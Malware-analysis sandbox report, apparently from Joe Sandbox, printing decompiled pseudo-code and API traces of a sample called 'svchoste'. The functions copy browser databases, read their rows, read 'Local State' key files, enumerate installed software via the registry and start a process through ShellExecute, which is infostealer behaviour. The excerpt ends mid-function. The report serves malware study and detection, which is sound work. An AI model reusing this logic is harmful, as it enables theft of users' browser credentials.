Instruction ID: 36879ba8d49f190547b9bfea2ebda33e64a0e4c04d1a9c7e26c310cb32654c32
Opcode Fuzzy Hash: a597c7e243b28739281722afaf967faa8650fc8d76218d83b4e68461b5319c08
Instruction Fuzzy Hash: D82130B1E00109ABDF14EBE4CC82EFE77B5EF58300F0081A9F51577291DA75A945C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8DA80, Relevance: 12.2, APIs: 8, Instructions: 157
filestringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00B8DA80(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v316;
				char _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				void* __ebp;
				signed int _t44;
				void* _t56;
				int _t58;
				void* _t61;
				intOrPtr _t64;
				void* _t66;
				void* _t74;
				intOrPtr _t79;
				void* _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr _t92;
				CHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t117;
				void* _t120;

				_t111 = __esi;
				_t110 = __edi;
				_t83 = __ebx;
				_t44 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t44 ^ _t112;
				GetCurrentDirectoryA(0x104,  &_v580);
				_t84 =  *0xba2400; // 0x2d066f0
				 *0xba28c4( &_v580, _t84);
				CopyFileA(_a4,  &_v580, 1); // executed
				E00B791C0( &_v316, 0, 0x104);
				_t102 =  *0xba23e8; // 0x2d06aa8
				wsprintfA( &_v316, _t102, _a12, _a8);
				_t87 =  *0xba20b8; // 0x2d06f38
				_v44 = _t87;
				_t103 =  &_v40;
				_t56 =  *0xba2750( &_v580,  &_v40); // executed
				_t116 = _t113 + 0x24;
				if(_t56 == 0) {
					_t61 =  *0xba2700(_v40, _v44, 0xffffffff,  &_v48, 0); // executed
					_t117 = _t116 + 0x14;
					if(_t61 == 0) {
						_t92 =  *0xba21d0; // 0x2d010d8
						_t105 =  &_v316;
						_t64 = E00B755AB( &_v316, _t92); // executed
						_t117 = _t117 + 8;
						_v584 = _t64;
						if(_v584 != 0) {
							while(1) {
								_t66 =  *0xba2720(_v48); // executed
								_t120 = _t117 + 4;
								_t131 = _t66 - 0x64;
								if(_t66 != 0x64) {
									break;
								}
								_v592 =  *0xba273c(_v48, 0);
								_v588 =  *0xba273c(_v48, 1);
								_v596 =  *0xba273c(_v48, 2);
								_t74 =  *0xba272c(_v48, 3, _a16, _a20);
								_v600 = E00B8D730(_t83,  &_v36,  *0xba2734(), _v48, 3, _t74);
								_push(_v596);
								_push(_v588);
								_push(_v592);
								_push(E00B71330(_v600));
								_t79 =  *0xba2138; // 0x2d06510
								_push(_t79);
								_push(_v584);
								E00B755C2(_t83, _t110, _t111, _t131);
								E00B712D0( &_v36);
								_push("\n\n");
								_t105 = _v584;
								_push(_v584);
								E00B755C2(_t83, _t110, _t111, _t131);
								_t117 = _t120 + 0x5c;
							}
							_push(_v584);
							E00B75EA3(_t83, _t105, _t110, _t111, __eflags);
							_t117 = _t120 + 4;
						}
					}
					 *0xba2724(_v48);
					_t103 = _v40;
					 *0xba2754(_v40);
				}
				_t58 = DeleteFileA( &_v580); // executed
				__eflags = _v8 ^ _t112;
				return E00B74354(_t58, _t83, _v8 ^ _t112, _t103, _t110, _t111);
			}

0x00b8da80
0x00b8da80
0x00b8da80
0x00b8da89
0x00b8da90
0x00b8da9f
0x00b8daa5
0x00b8dab3
0x00b8dac6
0x00b8dada
0x00b8daea
0x00b8daf8
0x00b8db01
0x00b8db07
0x00b8db0a
0x00b8db15
0x00b8db1b
0x00b8db20
0x00b8db36
0x00b8db3c
0x00b8db41
0x00b8db47
0x00b8db4e
0x00b8db55
0x00b8db5a
0x00b8db5d
0x00b8db6a
0x00b8db70
0x00b8db74
0x00b8db7a
0x00b8db7d
0x00b8db80
0x00000000
0x00000000
0x00b8db95
0x00b8dbaa
0x00b8dbbf
0x00b8dbd3
0x00b8dbf9
0x00b8dc05
0x00b8dc0c
0x00b8dc13
0x00b8dc1f
0x00b8dc20
0x00b8dc25
0x00b8dc2c
0x00b8dc2d
0x00b8dc38
0x00b8dc3d
0x00b8dc42
0x00b8dc48
0x00b8dc49
0x00b8dc4e
0x00b8dc4e
0x00b8dc5c
0x00b8dc5d
0x00b8dc62
0x00b8dc62
0x00b8db6a
0x00b8dc69
0x00b8dc72
0x00b8dc76
0x00b8dc7c
0x00b8dc86
0x00b8dc8f
0x00b8dc99

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8DA9F
lstrcat.KERNEL32(?,02D066F0), ref: 00B8DAB3
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8DAC6
_memset.LIBCMT ref: 00B8DADA
wsprintfA.USER32 ref: 00B8DAF8
DeleteFileA.KERNEL32(?), ref: 00B8DC86

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

Part of subcall function 00B8D730: _memset.LIBCMT ref: 00B8D7A4
Part of subcall function 00B8D730: LocalAlloc.KERNEL32(00000040,?), ref: 00B8D7F3

_fprintf.LIBCMT ref: 00B8DC2D
_fprintf.LIBCMT ref: 00B8DC49

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File_fprintf_memset$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuflstrcatwsprintf
String ID:
API String ID: 1106594688-0
Opcode ID: b5885e4339c8592d33715a007d4e1c374ef8c7ad3157ee593a56d2d32d0c12e4
Instruction ID: 6f7a3c5ea9f956fdd2b229142dcd268a536dfc5f3d9eb3e1740a050259068d33
Opcode Fuzzy Hash: b5885e4339c8592d33715a007d4e1c374ef8c7ad3157ee593a56d2d32d0c12e4
Instruction Fuzzy Hash: 9A5165B1D00208ABCB14EFA8DC8AFDE77B8EF48301F048199F619A7250DA759E54CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B7B0, Relevance: 12.1, APIs: 8, Instructions: 121
filestringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00B8B7B0(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				void* __ebp;
				signed int _t31;
				void* _t43;
				int _t44;
				void* _t47;
				intOrPtr _t51;
				void* _t53;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t73;
				CHAR* _t76;
				void* _t81;
				void* _t82;
				signed int _t83;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t91;

				_t82 = __esi;
				_t81 = __edi;
				_t61 = __ebx;
				_t31 =  *0xba01f4; // 0xac8b3e58
				_v20 = _t31 ^ _t83;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t62 =  *0xba2400; // 0x2d066f0
				 *0xba28c4( &_v548, _t62);
				CopyFileA(_a4,  &_v548, 1); // executed
				E00B791C0( &_v284, 0, 0x104);
				_t76 =  *0xba21a8; // 0x2d06220
				wsprintfA( &_v284, _t76, _a12, _a8);
				_t65 =  *0xba25f0; // 0x2d01588
				_v12 = _t65;
				_t77 =  &_v8;
				_t43 =  *0xba2750( &_v548,  &_v8); // executed
				_t87 = _t84 + 0x24;
				if(_t43 == 0) {
					_t47 =  *0xba2700(_v8, _v12, 0xffffffff,  &_v16, 0); // executed
					_t88 = _t87 + 0x14;
					if(_t47 == 0) {
						_t70 =  *0xba21d0; // 0x2d010d8
						_t79 =  &_v284;
						_t51 = E00B755AB( &_v284, _t70); // executed
						_t88 = _t88 + 8;
						_v552 = _t51;
						if(_v552 != 0) {
							while(1) {
								_t53 =  *0xba2720(_v16);
								_t91 = _t88 + 4;
								_t98 = _t53 - 0x64;
								if(_t53 != 0x64) {
									break;
								}
								_v556 =  *0xba273c(_v16, 0);
								_push( *0xba273c(_v16, 1));
								_push(_v556);
								_t73 =  *0xba24f8; // 0x2d067b0
								_push(_t73);
								_t79 = _v552;
								_push(_v552);
								E00B755C2(_t61, _t81, _t82, _t98);
								_push("\n");
								_push(_v552);
								E00B755C2(_t61, _t81, _t82, _t98);
								_t88 = _t91 + 0x28;
							}
							_push(_v552);
							E00B75EA3(_t61, _t79, _t81, _t82, __eflags);
							_t88 = _t91 + 4;
						}
					}
					_t77 = _v16;
					 *0xba2724(_v16);
					 *0xba2754(_v8);
				}
				_t44 = DeleteFileA( &_v548); // executed
				__eflags = _v20 ^ _t83;
				return E00B74354(_t44, _t61, _v20 ^ _t83, _t77, _t81, _t82);
			}

0x00b8b7b0
0x00b8b7b0
0x00b8b7b0
0x00b8b7b9
0x00b8b7c0
0x00b8b7cf
0x00b8b7d5
0x00b8b7e3
0x00b8b7f6
0x00b8b80a
0x00b8b81a
0x00b8b828
0x00b8b831
0x00b8b837
0x00b8b83a
0x00b8b845
0x00b8b84b
0x00b8b850
0x00b8b866
0x00b8b86c
0x00b8b871
0x00b8b877
0x00b8b87e
0x00b8b885
0x00b8b88a
0x00b8b88d
0x00b8b89a
0x00b8b89c
0x00b8b8a0
0x00b8b8a6
0x00b8b8a9
0x00b8b8ac
0x00000000
0x00000000
0x00b8b8bd
0x00b8b8d2
0x00b8b8d9
0x00b8b8da
0x00b8b8e0
0x00b8b8e1
0x00b8b8e7
0x00b8b8e8
0x00b8b8f0
0x00b8b8fb
0x00b8b8fc
0x00b8b901
0x00b8b901
0x00b8b90c
0x00b8b90d
0x00b8b912
0x00b8b912
0x00b8b89a
0x00b8b915
0x00b8b919
0x00b8b926
0x00b8b92c
0x00b8b936
0x00b8b93f
0x00b8b949

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8B7CF
lstrcat.KERNEL32(?,02D066F0), ref: 00B8B7E3
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8B7F6
_memset.LIBCMT ref: 00B8B80A
wsprintfA.USER32 ref: 00B8B828
DeleteFileA.KERNEL32(?), ref: 00B8B936

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

_fprintf.LIBCMT ref: 00B8B8E8
_fprintf.LIBCMT ref: 00B8B8FC

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
String ID:
API String ID: 556801341-0
Opcode ID: fd9053a0f930be31926e1a64a3f9a46e36b2a1bd677302a8dfdd2e1fd13c50af
Instruction ID: 9701ee41f8d914a50ae5e67b7babd64ec3b2028c79d2cc04b0ee08d4e65c1b51
Opcode Fuzzy Hash: fd9053a0f930be31926e1a64a3f9a46e36b2a1bd677302a8dfdd2e1fd13c50af
Instruction Fuzzy Hash: 654154B1D00208BBDB14DFA8EC8AEEE73B8EB49300F044598F61A97251DB35AE54CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8E990, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B8E990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0xba01f4; // 0xac8b3e58
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E00B791C0( &_v284, 0, 0x104);
				E00B8A380( &_v284, 0x1a); // executed
				 *0xba28c4( &_v284, _a4);
				E00B791C0( &_v548, 0, 0x104);
				 *0xba28c4( &_v548,  &_v284);
				 *0xba28c4( &_v548, "\\Local State");
				_t36 = E00B8A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E00B8D900(__ebx,  &_v548,  &_v12,  &_v8);
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E00B8CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E00B8E640(_t46, _t62, _t63, 0xb99447,  &_v284, _a8, _v12, _v8); // executed
				return E00B74354(E00B8CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}

0x00b8e990
0x00b8e990
0x00b8e990
0x00b8e999
0x00b8e9a0
0x00b8e9a3
0x00b8e9aa
0x00b8e9bf
0x00b8e9d0
0x00b8e9e3
0x00b8e9f7
0x00b8ea0d
0x00b8ea1f
0x00b8ea2c
0x00b8ea31
0x00b8ea36
0x00b8ea47
0x00b8ea4c
0x00b8ea51
0x00b8ea5b
0x00b8ea60
0x00b8ea60
0x00b8ea51
0x00b8ea7b
0x00b8eaa0

APIs

_memset.LIBCMT ref: 00B8E9BF

Part of subcall function 00B8A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B8A39D

lstrcat.KERNEL32(?,00000000), ref: 00B8E9E3
_memset.LIBCMT ref: 00B8E9F7
lstrcat.KERNEL32(?,?), ref: 00B8EA0D
lstrcat.KERNEL32(?,\Local State), ref: 00B8EA1F

Part of subcall function 00B8A6E0: GetFileAttributesA.KERNEL32(?), ref: 00B8A6EA

Strings

\Local State, xrefs: 00B8EA13

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$AttributesFileFolderPath
String ID: \Local State
API String ID: 3917447719-679424310
Opcode ID: 390d85a6b76c3abef839c5065c996073a531579d110061cd28fa43b9007dbd18
Instruction ID: c1e7f9bf016f2ce46a0999aa1638ab17c1d4f43f58a2882a80f3f567851042bd
Opcode Fuzzy Hash: 390d85a6b76c3abef839c5065c996073a531579d110061cd28fa43b9007dbd18
Instruction Fuzzy Hash: DD3154B6D0010CBBCB14EBD0EC86FDE77B8AB58704F4441D9B619A6192EB34D748CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EAB0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B8EAB0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0xba01f4; // 0xac8b3e58
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E00B791C0( &_v284, 0, 0x104);
				E00B8A380( &_v284, 0x1c); // executed
				 *0xba28c4( &_v284, _a4);
				E00B791C0( &_v548, 0, 0x104);
				 *0xba28c4( &_v548,  &_v284);
				 *0xba28c4( &_v548, "\\Local State");
				_t36 = E00B8A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E00B8D900(__ebx,  &_v548,  &_v12,  &_v8); // executed
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E00B8CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E00B8E640(_t46, _t62, _t63, 0xb99446,  &_v284, _a8, _v12, _v8); // executed
				return E00B74354(E00B8CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}

0x00b8eab0
0x00b8eab0
0x00b8eab0
0x00b8eab9
0x00b8eac0
0x00b8eac3
0x00b8eaca
0x00b8eadf
0x00b8eaf0
0x00b8eb03
0x00b8eb17
0x00b8eb2d
0x00b8eb3f
0x00b8eb4c
0x00b8eb51
0x00b8eb56
0x00b8eb67
0x00b8eb6c
0x00b8eb71
0x00b8eb7b
0x00b8eb80
0x00b8eb80
0x00b8eb71
0x00b8eb9b
0x00b8ebc0

APIs

_memset.LIBCMT ref: 00B8EADF

Part of subcall function 00B8A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B8A39D

lstrcat.KERNEL32(?,00000000), ref: 00B8EB03
_memset.LIBCMT ref: 00B8EB17
lstrcat.KERNEL32(?,?), ref: 00B8EB2D
lstrcat.KERNEL32(?,\Local State), ref: 00B8EB3F

Part of subcall function 00B8A6E0: GetFileAttributesA.KERNEL32(?), ref: 00B8A6EA

Strings

\Local State, xrefs: 00B8EB33

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$AttributesFileFolderPath
String ID: \Local State
API String ID: 3917447719-679424310
Opcode ID: 044d242216b624b29256e767068219ebfb6f738d41b7a92ec30cef44bd22449a
Instruction ID: cd3d3d193cfe83c7eeb613f80c558919ae4367e1cc72529e9b1974372a5c6ded
Opcode Fuzzy Hash: 044d242216b624b29256e767068219ebfb6f738d41b7a92ec30cef44bd22449a
Instruction Fuzzy Hash: 613166B6D0010CBBCB14EBD0EC86FDE77B8AB18704F4441D9B61966192EB74D748CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AD33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B8AD33() {
				void* _t53;
				long _t56;
				long _t60;
				long _t62;
				long _t69;
				void* _t78;
				char* _t87;
				char* _t94;
				void* _t107;
				void* _t108;
				signed int _t109;

				L0:
				while(1) {
					L0:
					 *(_t109 - 0x31960) =  *(_t109 - 0x31960) + 1;
					if( *(_t109 - 0x814) != 0) {
						break;
					}
					L2:
					 *(_t109 - 0x818) = 0x400;
					_t56 = RegEnumKeyExA( *(_t109 - 0x810),  *(_t109 - 0x31960), _t109 - 0x408, _t109 - 0x818, 0, 0, 0, 0); // executed
					 *(_t109 - 0x814) = _t56;
					if( *(_t109 - 0x814) != 0) {
						L13:
						continue;
					} else {
						L3:
						wsprintfA(_t109 - 0x808, "%s\\%s",  *((intOrPtr*)(_t109 - 0x3195c)), _t109 - 0x408);
						_t60 = RegOpenKeyExA(0x80000002, _t109 - 0x808, 0, 0x20019, _t109 - 0x80c); // executed
						if(_t60 == 0) {
							L5:
							 *(_t109 - 0x818) = 0x400;
							_t87 =  *0xba2678; // 0x2d06c70
							_t62 = RegQueryValueExA( *(_t109 - 0x80c), _t87, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
							if(_t62 == 0) {
								L6:
								 *((intOrPtr*)(_t109 - 0x31964)) = _t109 - 0xc18;
								 *((intOrPtr*)(_t109 - 0x31968)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								do {
									L7:
									 *((char*)(_t109 - 0x31969)) =  *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x31964))));
									 *((intOrPtr*)(_t109 - 0x31964)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								} while ( *((char*)(_t109 - 0x31969)) != 0);
								 *((intOrPtr*)(_t109 - 0x31970)) =  *((intOrPtr*)(_t109 - 0x31964)) -  *((intOrPtr*)(_t109 - 0x31968));
								if( *((intOrPtr*)(_t109 - 0x31970)) > 1) {
									L9:
									 *0xba28c4(_t109 - 0x31958, _t109 - 0xc18);
									 *(_t109 - 0x818) = 0x400;
									_t94 =  *0xba2418; // 0x2d06c40
									_t69 = RegQueryValueExA( *(_t109 - 0x80c), _t94, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
									if(_t69 == 0) {
										 *0xba28c4(_t109 - 0x31958, " ");
										 *0xba28c4(_t109 - 0x31958, _t109 - 0xc18);
									}
									L11:
									 *0xba28c4(_t109 - 0x31958, "\n");
								}
							}
							L12:
							RegCloseKey( *(_t109 - 0x80c));
							goto L13;
						} else {
							L4:
							_t96 =  *(_t109 - 0x80c);
							RegCloseKey( *(_t109 - 0x80c));
							RegCloseKey( *(_t109 - 0x810));
							_t53 = _t109 - 0x31958;
						}
					}
					L15:
					return E00B74354(_t53, _t78,  *(_t109 - 8) ^ _t109, _t96, _t107, _t108);
					L16:
				}
				L14:
				_t96 =  *(_t109 - 0x810);
				RegCloseKey( *(_t109 - 0x810));
				_t53 = _t109 - 0x31958;
				goto L15;
			}

0x00b8ad33
0x00b8ad33
0x00b8ad33
0x00b8ad3c
0x00b8ad49
0x00000000
0x00000000
0x00b8ad4f
0x00b8ad4f
0x00b8ad7d
0x00b8ad83
0x00b8ad90
0x00b8af23
0x00000000
0x00b8ad96
0x00b8ad96
0x00b8adb0
0x00b8add3
0x00b8addb
0x00b8ae02
0x00b8ae02
0x00b8ae20
0x00b8ae2e
0x00b8ae36
0x00b8ae3c
0x00b8ae42
0x00b8ae51
0x00b8ae57
0x00b8ae57
0x00b8ae5f
0x00b8ae65
0x00b8ae6c
0x00b8ae81
0x00b8ae8e
0x00b8ae94
0x00b8aea2
0x00b8aea8
0x00b8aec6
0x00b8aed4
0x00b8aedc
0x00b8aeea
0x00b8aefe
0x00b8aefe
0x00b8af04
0x00b8af10
0x00b8af10
0x00b8ae8e
0x00b8af16
0x00b8af1d
0x00000000
0x00b8addd
0x00b8addd
0x00b8addd
0x00b8ade4
0x00b8adf1
0x00b8adf7
0x00b8adf7
0x00b8addb
0x00b8af3b
0x00b8af48
0x00000000
0x00b8af48
0x00b8af28
0x00b8af28
0x00b8af2f
0x00b8af35
0x00000000

APIs

RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 00B8AD7D
wsprintfA.USER32 ref: 00B8ADB0
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 00B8ADD3
RegCloseKey.ADVAPI32(?), ref: 00B8ADE4
RegCloseKey.ADVAPI32(?), ref: 00B8ADF1
RegQueryValueExA.KERNEL32(?,02D06C70,00000000,000F003F,?,00000400), ref: 00B8AE2E
lstrcat.KERNEL32(?,?), ref: 00B8AEA2
RegQueryValueExA.KERNEL32(?,02D06C40,00000000,000F003F,?,00000400), ref: 00B8AED4
lstrcat.KERNEL32(?,00B99B9C), ref: 00B8AEEA
lstrcat.KERNEL32(?,?), ref: 00B8AEFE
lstrcat.KERNEL32(?,00B99BA0), ref: 00B8AF10
RegCloseKey.ADVAPI32(?), ref: 00B8AF1D
RegCloseKey.ADVAPI32(00000000), ref: 00B8AF2F

Strings

%s\%s, xrefs: 00B8ADA4

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Closelstrcat$QueryValue$EnumOpenwsprintf
String ID: %s\%s
API String ID: 1306442838-4073750446
Opcode ID: 2029c3d860205716c01e4198a8efb36110384aece1d73bb9692ec6c82d4972d7
Instruction ID: 4396f2624c29a644412ffb4dfca374ca92a7f24e0ec0049e1cd12b3859857fb9
Opcode Fuzzy Hash: 2029c3d860205716c01e4198a8efb36110384aece1d73bb9692ec6c82d4972d7
Instruction Fuzzy Hash: FD21EAB590022C9BDB64DB54CC96BE9B3FCFF48704F0485D9A249A6190DF705AC5CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A720, Relevance: 10.6, APIs: 7, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B8A720(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t10;
				void* _t16;
				long _t17;
				CHAR* _t18;
				void* _t22;
				char* _t32;
				signed int _t35;

				_t10 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t10 ^ _t35;
				E00B791C0( &_v276, 0, 0x104);
				E00B791C0( &_v540, 0, 0x104);
				_push(_a4);
				_t16 = E00B8A600(GetCurrentProcessId()); // executed
				_t17 = GetCurrentProcessId();
				_t18 =  *0xba22cc; // 0x2d074d0
				wsprintfA( &_v276, _t18, _t17);
				GetCurrentDirectoryA(0x104,  &_v540);
				_t32 =  *0xba2634; // 0x2d073f8
				_t22 = ShellExecuteA(0, 0, _t32,  &_v276,  &_v540, 0); // executed
				return E00B74354(_t22, __ebx, _v8 ^ _t35, _t32, __edi, __esi, _t16);
			}

0x00b8a729
0x00b8a730
0x00b8a741
0x00b8a757
0x00b8a762
0x00b8a76a
0x00b8a773
0x00b8a77a
0x00b8a787
0x00b8a79c
0x00b8a7b2
0x00b8a7bd
0x00b8a7d0

APIs

_memset.LIBCMT ref: 00B8A741
_memset.LIBCMT ref: 00B8A757
GetCurrentProcessId.KERNEL32(?), ref: 00B8A763

Part of subcall function 00B8A600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B8A61E
Part of subcall function 00B8A600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00B8A63F
Part of subcall function 00B8A600: CloseHandle.KERNEL32(00000000), ref: 00B8A649

GetCurrentProcessId.KERNEL32(00000000), ref: 00B8A773
wsprintfA.USER32 ref: 00B8A787
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8A79C
ShellExecuteA.SHELL32(00000000,00000000,02D073F8,?,?,00000000), ref: 00B8A7BD

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CurrentProcess$_memset$CloseDirectoryExecuteFileHandleModuleNameOpenShellwsprintf
String ID:
API String ID: 2405513257-0
Opcode ID: 2c312a551fd4680745e133e86a6fd1948cd95b08766b3562c10ab9ae956db717
Instruction ID: d79535fe31506c88e6b6b4413ec4477494db41a0c3b7594663163395c84f1b6b
Opcode Fuzzy Hash: 2c312a551fd4680745e133e86a6fd1948cd95b08766b3562c10ab9ae956db717
Instruction Fuzzy Hash: 5F11DBB1D40208BBD704EBA4DC8BFDA73BCEB59704F404198B719A71D1EE749A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B888D0, Relevance: 9.4, APIs: 3, Strings: 2, Instructions: 694
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B888D0(void* __ebx, signed int* __ecx, void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				char _v13;
				char _v24;
